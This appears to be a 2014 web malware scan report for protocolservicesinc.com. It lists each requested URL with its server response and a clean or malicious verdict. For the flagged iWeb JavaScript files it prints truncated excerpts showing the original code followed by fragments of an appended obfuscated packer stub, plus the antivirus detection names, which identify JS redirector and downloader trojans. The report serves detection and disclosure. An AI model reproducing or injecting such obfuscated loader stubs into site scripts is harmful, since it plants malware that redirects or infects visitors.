Request | Server response | Status |
http://protocolservicesinc.com/ | HTTP/1.1 200 OK Date: Thu, 21 Aug 2014 12:31:19 GMT Accept-Ranges: bytes ETag: "80f9e82fe726cc1:0" Server: Microsoft-IIS/7.0 Content-Length: 337 Content-Type: text/html Last-Modified: Thu, 09 Jun 2011 20:52:47 GMT X-Powered-By: ASP.NET
| clean |
http://protocolservicesinc.com/www.protocolservicesinc.com/welcome.html | 200 OK Content-Length: 11647 Content-Type: text/html | clean |
http://protocolservicesinc.com/www.protocolservicesinc.com/Scripts/iWebSite.js | 200 OK Content-Length: 148321 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype={Version:'1.6.0',Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf('AppleWebKit/')>-1,Gecko:navigator.userAgent.indexOf('Gecko')>-1&&navigator.userAgent.indexOf('KHTML')==-1,MobileSafari:!!navigator.userAgent.match(/Apple.*Mobile.*Safari/)},BrowserFeatures:{XPath:!!document.evaluate,ElementExtensions:!!window.HTMLElement,SpecificElementExtensions:document.createElement('div').__proto__&&document.c
... 3107 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Scripts/Widgets/SharedResources/WidgetCommon.js | 200 OK Content-Length: 38330 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var widgets=[];var identifiersToStringLocalizations=[];var Widget=Class.create({initialize:function(instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp) {if(instanceID) {this.instanceID=instanceID;this.widgetPath=widgetPath;this.sharedPath=sharedPath;this.sitePath=sitePath;this.preferences=preferences;this.runningInApp=(runningInApp===undefined)?false:runningInApp;this.onloadReceived=false;if(this.preferences&&this.runningInApp==true) {this.preferences.widget=t
... 3144 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Scripts/Widgets/Navbar/navbar.js | 200 OK Content-Length: 8192 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var NavBar=Class.create(Widget,{widgetIdentifier:"com-apple-iweb-widget-NavBar",initialize:function($super,instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp) {if(instanceID) {$super(instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp);if(!this.preferenceForKey("useStaticFeed")&&this.preferenceForKey("dotMacAccount")) {var depthPrefix=this.preferenceForKey("path-to-root");if(!depthPrefix||depthPrefix=="") depthPrefix="./";this.xml_feed=depth
... 3128 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Virus.JS.Agent
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Comodo
- TrojWare.JS.Agent.C
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Welcome_files/Welcome.js | 200 OK Content-Length: 2801 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) setTransparentGifURL('Media/transparent.gif');function hostedOnDM() {return false;} function onPageLoad() {loadMozillaCSS('Welcome_files/WelcomeMoz.css') adjustLineHeightIfTooBig('id1');adjustFontSizeIfTooBig('id1');adjustLineHeightIfTooBig('id2');adjustFontSizeIfTooBig('id2');adjustLineHeightIfTooBig('id3');adjustFontSizeIfTooBig('id3');adjustLineHeightIfTooBig('id4');adjustFontSizeIfTooBig('id4');Widget.onload();fixupAllIEPNGBGs();fixAllIEPNGs('Media/transparent.gif');performPo
... 1780 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Comodo
- TrojWare.JS.Agent.C
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Missions.html | 200 OK Content-Length: 15501 Content-Type: text/html | clean |
http://protocolservicesinc.com/Scripts/iWebSite.js | 200 OK Content-Length: 148321 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Prototype={Version:'1.6.0',Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf('AppleWebKit/')>-1,Gecko:navigator.userAgent.indexOf('Gecko')>-1&&navigator.userAgent.indexOf('KHTML')==-1,MobileSafari:!!navigator.userAgent.match(/Apple.*Mobile.*Safari/)},BrowserFeatures:{XPath:!!document.evaluate,ElementExtensions:!!window.HTMLElement,SpecificElementExtensions:document.createElement('div').__proto__&&document.c
... 3107 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Scripts/iWebImage.js | 200 OK Content-Length: 41868 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var IWAllImages={};var IWAllImageObjects={};function IWCreateImage(url) {return IWAllImages[url]||new IWImage(url);} var IWNamedImages={};function IWImageNamed(name) {var url=IWNamedImages[name];return url?IWCreateImage(url):null} function IWRegisterNamedImage(name,url) {IWNamedImages[name]=url;} var IWImageEnableUnload=isiPhone;var IWImage=Class.create({initialize:function(url) {if(IWAllImages.hasOwnProperty(url)) {iWLog("warning -- use IWCreateImage rather than
... 3158 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Scripts/iWebMediaGrid.js | 200 OK Content-Length: 67551 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var IWAllFeeds={};function IWCreateFeed(url) {var feed=IWAllFeeds[url];if(feed==null) {feed=new IWFeed(url);} return feed;} var IWFeed=Class.create({initialize:function(url) {if(url) {if(IWAllFeeds.hasOwnProperty(url)) {iWLog("warning -- use IWCreateFeed rather than new IWFeed and you'll get better performance");} this.mURL=url;this.mLoading=false;this.mLoaded=false;this.mCallbacks=[];this.mImageStream=null;IWAllFeeds[url]=this;}},sourceURL:function() {return
... 3137 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Comodo
- TrojWare.JS.Agent.C
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Scripts/Widgets/YouTube/YouTube.js | 200 OK Content-Length: 10981 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var YouTubeWidget=Class.create(Widget,{widgetIdentifier:"com-apple-iweb-widget-YouTube",thumbnailURL:null,initialize:function($super,instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp) {if(instanceID) {$super(instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp);if(this.runningInApp) {window.onresize=this.resize.bind(this);} var parentDiv=this.div("youTube");this.m_views={};this.m_views["movie"]=new YouTubeMovieView(this,parentDiv);if(runningInApp) ... 3107 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- ESET-NOD32
- JS/Agent.NDY
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Scripts/Widgets/YouTube/localizedStrings.js | 200 OK Content-Length: 2682 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var strings={};strings['<b>The YouTube URL you entered is invalid.</b><br />Double-check the URL on YouTube, and then try again.']='<b>The YouTube URL you entered is invalid.</b><br />Double-check the URL on YouTube, and then try again.';strings['<b>You must be connected to the Internet to view the YouTube movie.</b>']='<b>You must be connected to the Internet to view the YouTube movie.</b>';RegisterWidgetStrings("com-apple-
... 1744 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Comodo
- TrojWare.JS.Agent.C
- Emsisoft
- Trojan.JS.Agent.EXP (B)
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- DrWeb
- JS.DownLoader.216
- Microsoft
- Trojan:JS/Redirector.IM
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- F-Secure
- Trojan.JS.Agent.EXP
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/Missions_files/Missions.js | 200 OK Content-Length: 3241 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) setTransparentGifURL('Media/transparent.gif');function hostedOnDM() {return false;} function onPageLoad() {loadMozillaCSS('Missions_files/MissionsMoz.css') adjustLineHeightIfTooBig('id1');adjustFontSizeIfTooBig('id1');adjustLineHeightIfTooBig('id2');adjustFontSizeIfTooBig('id2');adjustLineHeightIfTooBig('id3');adjustFontSizeIfTooBig('id3');adjustLineHeightIfTooBig('id4');adjustFontSizeIfTooBig('id4');adjustLineHeightIfTooBig('id5');adjustFontSizeIfTooBig('id5');adjustLineHeightIf
... 2220 bytes are skipped .../^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));Antivirus reports:- AntiVir
- JS/Infected.C
- Avast
- JS:Agent-AZY [Trj]
- Ad-Aware
- Trojan.JS.Agent.EXP
- Ikarus
- Trojan.JS.Alescurf
- AhnLab-V3
- JS/IFrame
- nProtect
- Trojan.JS.Agent.EXP
- K7AntiVirus
- Exploit ( 04c561271 )
- Comodo
- TrojWare.JS.Agent.C
- CAT-QuickHeal
- JS/Alescurf.D
- K7GW
- Exploit ( 04c561271 )
- McAfee-GW-Edition
- JS/Redirector
- DrWeb
- JS.DownLoader.216
- Kaspersky
- Trojan-Downloader.JS.Agent.gnk
- MicroWorld-eScan
- Trojan.JS.Agent.EXP
- Fortinet
- JS/Redirector.KO!tr
- TotalDefense
- JS/Alescurf.B
- McAfee
- JS/Redirector
- NANO-Antivirus
- Trojan.Script.Agent.lyldx
- ClamAV
- JS.Trojan.Redir-3
- VIPRE
- Trojan.JS.Generic (v)
- F-Prot
- JS/Agent.PL
- AVG
- JS/Agent.Y
- Norman
- Agent.ACM
- Sophos
- Troj/JSRedir-DO
- GData
- Trojan.JS.Agent.EXP
- Symantec
- JS.Alescurf
- Commtouch
- JS/Agent.PL
- AVware
- Trojan.JS.Generic (v)
- BitDefender
- Trojan.JS.Agent.EXP
|
http://protocolservicesinc.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |